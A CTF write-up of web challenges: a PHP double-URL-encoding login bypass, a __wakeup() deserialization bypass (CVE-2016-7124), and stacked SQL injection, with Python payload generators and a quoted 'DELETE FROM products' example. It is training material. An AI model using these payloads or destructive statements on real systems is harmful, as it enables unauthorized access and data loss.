CTF_ Web: Advanced questions of attack and defense world expert zone WP (9-14)
2022-06-25 04:30:00 【AFCC_】
Continuously updated.
0x09 PHP2

The challenge page shows a single sentence, "Can you anthenticate to this website?" (typo in the original). Honestly I had no idea at first. dirsearch found only index.php, which contains nothing useful, and every earlier write-up pointed to index.phps as a source-code disclosure, so I looked there. (A .phps file is served as highlighted PHP source instead of being executed, which is why it leaks the check.)
    <?php
    // First check: strict comparison on the raw parameter (already decoded once by PHP)
    if("admin"===$_GET[id]) {
        echo("<p>not allowed!</p>");
        exit();
    }

    // Second check: the parameter is decoded a second time before comparison
    $_GET[id] = urldecode($_GET[id]);
    if($_GET[id] == "admin")
    {
        echo "<p>Access granted!</p>";
        echo "<p>Key: xxxxxxx </p>";
    }
    ?>
    Can you anthenticate to this website?
The code above is the whole check: the raw id parameter must not be exactly "admin", but after one more urldecode() it must equal "admin". The letter a is %61, so the first idea is id=%61dmin. That fails because the query string is already percent-decoded once before it lands in $_GET, so PHP sees "admin" and hits the first branch. Encode the % itself as %25: id=%2561dmin arrives in $_GET as "%61dmin" (passes the first check), and urldecode() turns it into "admin" (passes the second). That gives the flag. The general rule: every layer that decodes once is a layer you can hide a second encoding behind.
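To make the two decoding stages concrete, here is an added example (my own code, not part of the challenge or the original write-up) that re-implements the index.phps logic in Python and builds the double-encoded value. The function names and the three return labels are my own; PHP's `$_GET` parsing is modelled with `unquote_plus`, which matches it for these inputs.

```python
from urllib.parse import unquote_plus


def webserver_decode(raw: str) -> str:
    """First decode: PHP percent-decodes the query string once while
    building $_GET, so this is what $_GET[id] actually holds."""
    return unquote_plus(raw)


def php2_check(raw_id: str) -> str:
    """Reconstruction of the challenge's index.phps branch logic (not the
    original runtime). Returns which branch the PHP code would take."""
    get_id = webserver_decode(raw_id)        # $_GET[id]
    if "admin" == get_id:                    # if("admin"===$_GET[id])
        return "not allowed"
    decoded = unquote_plus(get_id)           # $_GET[id] = urldecode($_GET[id]);
    if decoded == "admin":                   # if($_GET[id] == "admin") -- both strings, so == is safe
        return "access granted"
    return "no output"


def double_encode_first_char(target: str) -> str:
    """Build the ?id= value: percent-encode one character of the target,
    then encode the '%' itself so the first decode only peels one layer."""
    first = "%%%02X" % ord(target[0])        # 'a' -> '%61'
    once = first + target[1:]                # '%61dmin'
    return once.replace("%", "%25")          # '%2561dmin'


if __name__ == "__main__":
    for candidate in ("admin", "%61dmin", double_encode_first_char("admin")):
        print("%-12s -> %s" % (candidate, php2_check(candidate)))
```

Only the double-encoded value reaches the second branch; the single-encoded one is already "admin" by the time PHP compares it.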
0x10 unserialize3
The challenge opens with:
    <?php
    class xctf{
        public $flag = '111';
        public function __wakeup(){
            exit('bad requests');   // any unserialize() of this class dies here
        }
    }
    ?code=
The code parameter is what gets unserialized, so the only job is to get past the magic method __wakeup(), which would exit() before anything useful happens. The trick (CVE-2016-7124, fixed in PHP 5.6.25 and 7.0.10) is that __wakeup() is skipped when the property count declared in the serialized string is larger than the number of properties actually present. The class has a single property, $flag, so a string that claims 2 properties while carrying 1 bypasses it. On a patched PHP the mismatch makes unserialize() fail instead, so this only works because the challenge presumably runs an old interpreter.
Write the following code :
    <?php
    // Same class without __wakeup(), just to produce the serialized form
    class xctf{
        public $flag = '111';
    }
    $a = new xctf();
    echo serialize($a);
This prints O:4:"xctf":1:{s:4:"flag";s:3:"111";}. Change the property count after the class name from 1 to 2, submit the result as code, and the flag comes back.
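Added example (my own code, not from the challenge or the write-up): a minimal PHP serialize() emitter in Python that produces the same string as the PHP snippet above, bumps the declared property count for the __wakeup() bypass, and reports the declared-versus-actual mismatch that the vulnerable PHP versions fail to reject. The helper names are mine; the format itself is PHP's standard serialization.

```python
import re


def php_serialize(value) -> str:
    """Emit PHP serialize() output for str, int, bool, None and objects.
    An object is passed as (class_name, {property: value})."""
    if value is None:
        return "N;"
    if isinstance(value, bool):                 # bool before int: bool subclasses int
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):                  # PHP counts bytes, not characters
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    if isinstance(value, tuple) and len(value) == 2:
        cls, props = value
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in props.items())
        return 'O:%d:"%s":%d:{%s}' % (len(cls), cls, len(props), body)
    raise TypeError("unsupported type: %r" % type(value))


_OBJ_HEAD = re.compile(r'^(O:\d+:"[^"]*":)(\d+)(:\{)')


def wakeup_bypass(serialized: str, extra: int = 1) -> str:
    """Inflate the declared property count of the outermost object without
    adding properties: the mismatch makes old PHP skip __wakeup() (CVE-2016-7124)."""
    m = _OBJ_HEAD.match(serialized)
    if not m:
        raise ValueError("not a serialized PHP object")
    return m.group(1) + str(int(m.group(2)) + extra) + m.group(3) + serialized[m.end():]


def _scalar_end(s: str, i: int) -> int:
    """Index just past one scalar token (N; i:..; b:..; s:N:"..";) starting at s[i]."""
    t = s[i]
    if t == "N":
        return i + 2
    if t in "ib":
        return s.index(";", i) + 1
    if t == "s":
        colon = s.index(":", i + 2)             # end of the length field
        n = int(s[i + 2:colon])
        return colon + 2 + n + 2                # :"<n bytes>";
    raise ValueError("unsupported token %r at %d" % (t, i))


def declared_vs_actual(serialized: str):
    """Return (declared_count, actual_count) for an object whose members are scalars,
    i.e. the two numbers old PHP compared incorrectly."""
    m = _OBJ_HEAD.match(serialized)
    if not m:
        raise ValueError("not a serialized PHP object")
    i, actual = m.end(), 0
    while serialized[i] != "}":
        i = _scalar_end(serialized, i)          # property name
        i = _scalar_end(serialized, i)          # property value
        actual += 1
    return int(m.group(2)), actual


if __name__ == "__main__":
    normal = php_serialize(("xctf", {"flag": "111"}))
    payload = wakeup_bypass(normal)
    print(normal)
    print(payload, declared_vs_actual(payload))
```

The same emitter works for any class with scalar properties, so the bypass can be applied to other deserialization challenges by changing the class name and properties only.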
Deserialization gets its own study later; for now I am just working through the problems.
0x11 upload1
The challenge environment would not start.
The challenge is a file upload guarded only by front-end JavaScript validation. Intercept the request and change the submitted parameters (file name, content type), or edit or disable the front-end JS; either bypasses the check, because client-side validation never protects the server.
0x12 Web_python_template_injection
The challenge environment would not start.
The challenge is a Python template injection (SSTI) problem. I will go through SSTI in detail later and build up the background knowledge.
0x13 Web_php_unserialize
The challenge environment would not start.
From the title it is a deserialization vulnerability. This part will be filled in later once the basics are in place.
0x14 supersqli(easysql)
The challenge is easysql from the 2019 Qiangwang Cup (强网杯); it is a SQL injection problem. First look at the challenge:
Entering 1' produces an error, confirming SQL injection.
order by shows the query returns 2 columns.
Trying a union query reveals that most keywords are blacklisted.
I had no good ideas at that point; mangling select (case changes and the like) also failed and kept returning errors. Earlier write-ups say stacked injection is needed. So what is the difference between a union query and stacked injection?
The following is quoted from "SQL Injection - Stacked Injection (heap query injection)"; thanks to its author for the summary.
- In SQL a semicolon (;) marks the end of a statement. If we end one statement with ; and then construct another after it, will both be executed? That idea is what stacked injection is built on.
- union injection also combines two statements, so what is the difference? The difference is that union or union all is limited in the kind of statement it can run: only query statements. Stacked injection can run arbitrary statements.
- For example, the user inputs:
  1; DELETE FROM products
  The server builds (since the input is not filtered):
  Select * from products where productid=1;DELETE FROM products
  When this runs, the first statement returns the query results and the second deletes the whole table.
- The limitation of stacked injection is that it cannot be executed in every environment; it may be blocked by the API or not supported by the database engine. (That is, it is not always applicable; does a case that suits union necessarily suit stacking?) Insufficient privileges can also explain why an attacker cannot modify data or call certain procedures.
Since stacked queries can run any statement, first learn some common statements for exploring the database:
show databases; list the databases.
show tables; list the tables in the current database.
desc words; show the structure of table words.
show columns from words; show the structure of table words (same as desc).
alter table t1 rename t2; rename a table.
alter table words change <old_column> <new_column> varchar(100); rename a column (MySQL's CHANGE requires the full column definition, so the type must be repeated).
Listing all tables shows only two: 1919810931114514 and words.
Check the structure of words.
Check the structure of 1919810931114514.
From the two structures, the page queries the words table, while the flag sits in the 1919810931114514 table. A normal request returns rows like:
array(2) {
[0]=>
string(1) "1"
[1]=>
string(7) "hahahah"
}
The idea is now obvious: read the flag column of that table. But select and other keywords are blocked, so earlier write-ups offered different ways around it.
- The first, from Lee-404, uses prepared statements to build the SQL at run time.
  PREPARE name FROM '<sql>'; -- define a prepared statement from a string
  EXECUTE name; -- run it
  DEALLOCATE PREPARE name; (or DROP PREPARE name;) -- drop it
  char() builds a string from character codes and concat() joins strings, so the blocked keyword never appears literally in the request:
  char(115,101,108,101,99,116) --> select
  Final payload: 1';PREPARE name from concat(char(115,101,108,101,99,116),'* from `1919810931114514`');EXECUTE name;# (an all-digit table name must be wrapped in backticks). Note that PREPARE ... FROM <expression> is a MariaDB extension; stock MySQL only accepts a string literal or a user variable there, so on MySQL store the string first with SET @a=concat(...); and then run PREPARE name FROM @a;.
- The second, from Art_Dillon, swaps in the table the page already queries.
  Prerequisite: renaming tables and columns.
  rename tables words to words1; rename a table.
  alter table words change flag id varchar(100); rename a column in the table.
  Final payload: 1' or 1=1;rename tables words to words1;rename tables `1919810931114514` to words;alter table words change flag id varchar(100);# After it runs, the page's own query hits the renamed flag table, so a second request with 1' or 1=1;# dumps every row, flag included. The column is renamed to id because the page's query filters on id; varchar(100) is the flag column's existing type, repeated because CHANGE needs the full definition. This approach rewrites the target database, which is fine for a CTF but not something to do on a live engagement.
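Added example (my own code, not from the challenge or either write-up) that serves both approaches above: it builds the prepared-statement payload (MariaDB form and the SET @q form for stock MySQL) and the table-rename payload, checks them against a keyword blacklist, and splits out the statements the server would actually run. The blacklist is a constructed stand-in, since the write-up only says "most keywords are disabled", and the page's own query `select * from words where id='...'` is my assumption from the rename trick working.

```python
import re

# Assumed case-insensitive blacklist; a constructed approximation of the challenge's
# filter, not its real source.
BLACKLIST = re.compile(r"select|update|delete|drop|insert", re.IGNORECASE)

TARGET_TABLE = "1919810931114514"   # table name from the write-up


def passes_filter(payload: str) -> bool:
    """True if no blacklisted keyword appears anywhere in the payload."""
    return BLACKLIST.search(payload) is None


def mysql_char(word: str) -> str:
    """Spell a word as a MySQL char() call so it never appears literally."""
    return "char(%s)" % ",".join(str(ord(c)) for c in word)


def prepare_payload(table: str, engine: str = "mariadb") -> str:
    """Stacked payload that rebuilds 'select * from <table>' at run time.
    MariaDB accepts an expression after PREPARE ... FROM; stock MySQL only takes a
    string literal or user variable, hence the SET @q variant."""
    stmt = "concat(%s,' * from `%s`')" % (mysql_char("select"), table)
    if engine == "mariadb":
        return "1';PREPARE name from %s;EXECUTE name;#" % stmt
    return "1';SET @q=%s;PREPARE name from @q;EXECUTE name;#" % stmt


def rename_payload(table: str, flag_column: str = "flag",
                   column_type: str = "varchar(100)") -> str:
    """Stacked payload that moves the flag table under the name the page queries and
    renames the flag column to id so the page's own 'where id=' query returns it."""
    return ("1' or 1=1;rename tables words to words1;"
            "rename tables `%s` to words;"
            "alter table words change %s id %s;#" % (table, flag_column, column_type))


def split_stacked(payload: str) -> list:
    """Embed the payload in the assumed page query and split on ';' outside
    quotes/backticks, stopping at the '#' comment: the statements the DB runs."""
    full = "select * from words where id='%s'" % payload   # assumed page query
    stmts, buf, in_quote = [], "", None
    for ch in full:
        if in_quote:
            buf += ch
            if ch == in_quote:
                in_quote = None
        elif ch in "'`":
            in_quote, buf = ch, buf + ch
        elif ch == "#":
            break                                  # rest of the line is a comment
        elif ch == ";":
            stmts.append(buf.strip())
            buf = ""
        else:
            buf += ch
    if buf.strip():
        stmts.append(buf.strip())
    return stmts


if __name__ == "__main__":
    for p in (prepare_payload(TARGET_TABLE), prepare_payload(TARGET_TABLE, "mysql"),
              rename_payload(TARGET_TABLE)):
        print("filter ok:", passes_filter(p))
        for s in split_stacked(p):
            print("   ", s)
```

Run it and note that a plain `1' union select 1,2#` is rejected by the same filter while every stacked payload passes, because the blocked keyword is either assembled from character codes at run time or not needed at all.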
Summary
Working through these problems over the past few days showed how much I still lack. That is the point of doing them: find the gaps, list them, and learn them one by one. Next up are the topics that came up above: weak-type md5 collisions, PHP pseudo-protocols, deserialization, template injection (SSTI) and so on.
Fill in the basics, then keep doing problems.